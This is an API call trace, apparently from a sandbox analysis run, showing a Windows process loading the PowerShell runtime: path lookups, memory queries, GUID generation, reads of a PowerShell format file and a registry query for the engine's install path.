	[0603.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.713] VirtualQuery (in: lpAddress=0xcb080, lpBuffer=0xcbf40, dwLength=0x30 | out: lpBuffer=0xcbf40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0603.714] VirtualQuery (in: lpAddress=0xcb110, lpBuffer=0xcbfd0, dwLength=0x30 | out: lpBuffer=0xcbfd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0603.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.715] VirtualQuery (in: lpAddress=0xcb890, lpBuffer=0xcc750, dwLength=0x30 | out: lpBuffer=0xcc750*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0603.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.717] VirtualQuery (in: lpAddress=0xcb890, lpBuffer=0xcc750, dwLength=0x30 | out: lpBuffer=0xcc750*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0603.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.719] VirtualQuery (in: lpAddress=0xcb890, lpBuffer=0xcc750, dwLength=0x30 | out: lpBuffer=0xcc750*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0603.720] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x1be847b7, Data2=0x53ab, Data3=0x4a40, Data4=([0]=0xbf, [1]=0x49, [2]=0xd8, [3]=0xfe, [4]=0xa3, [5]=0x16, [6]=0x77, [7]=0x9e))) returned 0x0
	[0603.722] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x5fa71f95, Data2=0xbd23, Data3=0x4e69, Data4=([0]=0x84, [1]=0x72, [2]=0x4, [3]=0xc0, [4]=0x4a, [5]=0xd7, [6]=0x4f, [7]=0x28))) returned 0x0
	[0603.722] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x67429eb4, Data2=0x6ad7, Data3=0x44ff, Data4=([0]=0x92, [1]=0xcc, [2]=0xec, [3]=0x2b, [4]=0x5a, [5]=0x52, [6]=0x2f, [7]=0xfd))) returned 0x0
	[0604.910] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x1041d4ad, Data2=0xc358, Data3=0x478b, Data4=([0]=0x8a, [1]=0x6d, [2]=0xd, [3]=0xb3, [4]=0xa7, [5]=0xa4, [6]=0xbd, [7]=0x8))) returned 0x0
	[0604.911] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x72e0a787, Data2=0x52d9, Data3=0x4cb9, Data4=([0]=0xb1, [1]=0x23, [2]=0x7a, [3]=0x3d, [4]=0xb6, [5]=0x80, [6]=0x87, [7]=0xb5))) returned 0x0
	[0604.911] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xffeda7b3, Data2=0x3abd, Data3=0x4d10, Data4=([0]=0xa5, [1]=0x4d, [2]=0x1c, [3]=0xd8, [4]=0x6c, [5]=0x1d, [6]=0x33, [7]=0xed))) returned 0x0
	[0604.912] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x2a2c8e2b, Data2=0xb7dc, Data3=0x4140, Data4=([0]=0x94, [1]=0x90, [2]=0x72, [3]=0xf5, [4]=0xef, [5]=0xb8, [6]=0xcf, [7]=0x81))) returned 0x0
	[0604.912] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x1ef2a314, Data2=0xde46, Data3=0x4089, Data4=([0]=0xb7, [1]=0xea, [2]=0x34, [3]=0x63, [4]=0x96, [5]=0x11, [6]=0x5f, [7]=0x30))) returned 0x0
	[0604.912] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x782ce47b, Data2=0x5820, Data3=0x4796, Data4=([0]=0x85, [1]=0xe3, [2]=0x29, [3]=0x4d, [4]=0xa2, [5]=0x29, [6]=0xbb, [7]=0x1f))) returned 0x0
	[0604.912] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x91e032e7, Data2=0xcb11, Data3=0x4c74, Data4=([0]=0x9d, [1]=0x3b, [2]=0x6a, [3]=0xb5, [4]=0xb0, [5]=0xda, [6]=0x57, [7]=0xb8))) returned 0x0
	[0604.912] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x546ad00f, Data2=0x207e, Data3=0x4ce0, Data4=([0]=0xbd, [1]=0xe8, [2]=0xbb, [3]=0xa5, [4]=0x85, [5]=0xe0, [6]=0x24, [7]=0xe2))) returned 0x0
	[0604.913] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xe16fa28a, Data2=0xb606, Data3=0x4d7f, Data4=([0]=0x8e, [1]=0x88, [2]=0x12, [3]=0xf8, [4]=0xbf, [5]=0x46, [6]=0xe3, [7]=0xe5))) returned 0x0
	[0604.914] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x34c02a6f, Data2=0x56ef, Data3=0x47e8, Data4=([0]=0x8f, [1]=0x56, [2]=0x65, [3]=0xd3, [4]=0x2a, [5]=0x88, [6]=0xbf, [7]=0x54))) returned 0x0
	[0604.915] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xf52ae6a2, Data2=0xca7b, Data3=0x410f, Data4=([0]=0xbb, [1]=0x8b, [2]=0x45, [3]=0xa1, [4]=0x61, [5]=0x91, [6]=0xe, [7]=0xde))) returned 0x0
	[0604.916] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xe86e25a3, Data2=0x62e2, Data3=0x4aa1, Data4=([0]=0xb4, [1]=0xb4, [2]=0xed, [3]=0xb7, [4]=0xae, [5]=0xdf, [6]=0x73, [7]=0x2b))) returned 0x0
	[0604.916] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x5675d680, Data2=0x10a9, Data3=0x43db, Data4=([0]=0x86, [1]=0xda, [2]=0x5b, [3]=0xbd, [4]=0xd9, [5]=0x7d, [6]=0x96, [7]=0xdf))) returned 0x0
	[0604.916] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x492f1291, Data2=0x7ae, Data3=0x4b62, Data4=([0]=0x91, [1]=0xef, [2]=0x18, [3]=0xe2, [4]=0x83, [5]=0xec, [6]=0xc6, [7]=0x8b))) returned 0x0
	[0604.916] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xe89c4677, Data2=0xb600, Data3=0x4525, Data4=([0]=0x84, [1]=0xd8, [2]=0xc6, [3]=0x9f, [4]=0x81, [5]=0xcc, [6]=0x42, [7]=0xe9))) returned 0x0
	[0604.917] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xc72476f4, Data2=0x29f3, Data3=0x45d7, Data4=([0]=0x8d, [1]=0xe5, [2]=0xb1, [3]=0xc6, [4]=0x9a, [5]=0x40, [6]=0x14, [7]=0xfa))) returned 0x0
	[0604.917] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xe9c31d2a, Data2=0x16f3, Data3=0x4d33, Data4=([0]=0x85, [1]=0x79, [2]=0xba, [3]=0x76, [4]=0x47, [5]=0x5c, [6]=0xe2, [7]=0xc6))) returned 0x0
	[0604.917] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xfe6bd2e9, Data2=0xd6a0, Data3=0x4d3a, Data4=([0]=0x95, [1]=0x84, [2]=0x2e, [3]=0xaf, [4]=0xe8, [5]=0xb7, [6]=0xfa, [7]=0xaf))) returned 0x0
	[0604.917] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x64c3eae2, Data2=0xfa52, Data3=0x49fc, Data4=([0]=0x8c, [1]=0x4f, [2]=0xb6, [3]=0xff, [4]=0xc5, [5]=0x32, [6]=0x36, [7]=0xfd))) returned 0x0
	[0604.917] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0604.918] GetFileType (hFile=0x2f0) returned 0x1
	[0604.918] SetErrorMode (uMode=0x1) returned 0x1
	[0604.918] GetFileType (hFile=0x2f0) returned 0x1
	[0604.918] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.921] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.921] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.921] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.922] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.922] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.922] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.922] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.922] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.925] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.925] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.926] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.926] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.926] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.927] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.927] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.927] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.931] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.931] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.931] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.932] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.932] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0xe67, lpOverlapped=0x0) returned 1
	[0604.933] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fcfff7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fcfff7*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0604.933] ReadFile (in: hFile=0x2f0, lpBuffer=0x2fd0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2fd0a28*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0604.933] CloseHandle (hObject=0x2f0) returned 1
	[0604.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0604.933] SetErrorMode (uMode=0x1) returned 0x1
	[0604.933] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0604.933] SetErrorMode (uMode=0x1) returned 0x1
	[0604.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0604.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f0) returned 0x0
	[0604.934] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0604.934] CoTaskMemAlloc (cb=0x5a) returned 0x1b3b7ea0
	[0604.934] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3b7ea0, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0604.934] CoTaskMemFree (pv=0x1b3b7ea0) 
	[0604.934] RegCloseKey (hKey=0x2f0) returned 0x0
	[0604.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0604.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0604.942] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xa3728d2c, Data2=0x6aab, Data3=0x4707, Data4=([0]=0x89, [1]=0xaf, [2]=0x9d, [3]=0xf8, [4]=0x9a, [5]=0xaf, [6]=0x5c, [7]=0x6f))) returned 0x0
	[0604.943] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xcb3e74c1, Data2=0xec4d, Data3=0x46b3, Data4=([0]=0x98, [1]=0xbb, [2]=0x3, [3]=0x37, [4]=0xb, [5]=0x5e, [6]=0x55, [7]=0xa4))) returned 0x0
	[0604.944] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xc4232cfa, Data2=0x1e0c, Data3=0x4fbd, Data4=([0]=0x9c, [1]=0x62, [2]=0x6d, [3]=0xb5, [4]=0xa7, [5]=0x24, [6]=0x4b, [7]=0x1))) returned 0x0
	[0604.944] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x6ae0b56b, Data2=0x19c3, Data3=0x43d9, Data4=([0]=0xbc, [1]=0x4b, [2]=0x23, [3]=0x81, [4]=0x66, [5]=0x5b, [6]=0xda, [7]=0x59))) returned 0x0
	[0604.945] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xa3be7eab, Data2=0x9d86, Data3=0x4ba3, Data4=([0]=0xaf, [1]=0x3a, [2]=0xb3, [3]=0xd9, [4]=0xf8, [5]=0x72, [6]=0x5a, [7]=0xfb))) returned 0x0
	[0604.945] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xbcc4c80a, Data2=0x8b55, Data3=0x4588, Data4=([0]=0xb5, [1]=0x81, [2]=0x5f, [3]=0x6d, [4]=0x79, [5]=0x6c, [6]=0x31, [7]=0xa))) returned 0x0
	[0604.946] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x96fd5619, Data2=0x4c25, Data3=0x4fb7, Data4=([0]=0xac, [1]=0x5c, [2]=0x88, [3]=0x66, [4]=0x5e, [5]=0x5a, [6]=0x6d, [7]=0x28))) returned 0x0
	[0604.946] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0604.948] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xa1e8642f, Data2=0xfeee, Data3=0x481b, Data4=([0]=0xbb, [1]=0x20, [2]=0x4, [3]=0xd2, [4]=0x31, [5]=0xb, [6]=0x9e, [7]=0xce))) returned 0x0
	[0604.948] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x1eefb790, Data2=0xd837, Data3=0x4ec6, Data4=([0]=0xb0, [1]=0xcd, [2]=0x41, [3]=0xb7, [4]=0x79, [5]=0xb4, [6]=0x58, [7]=0xbe))) returned 0x0
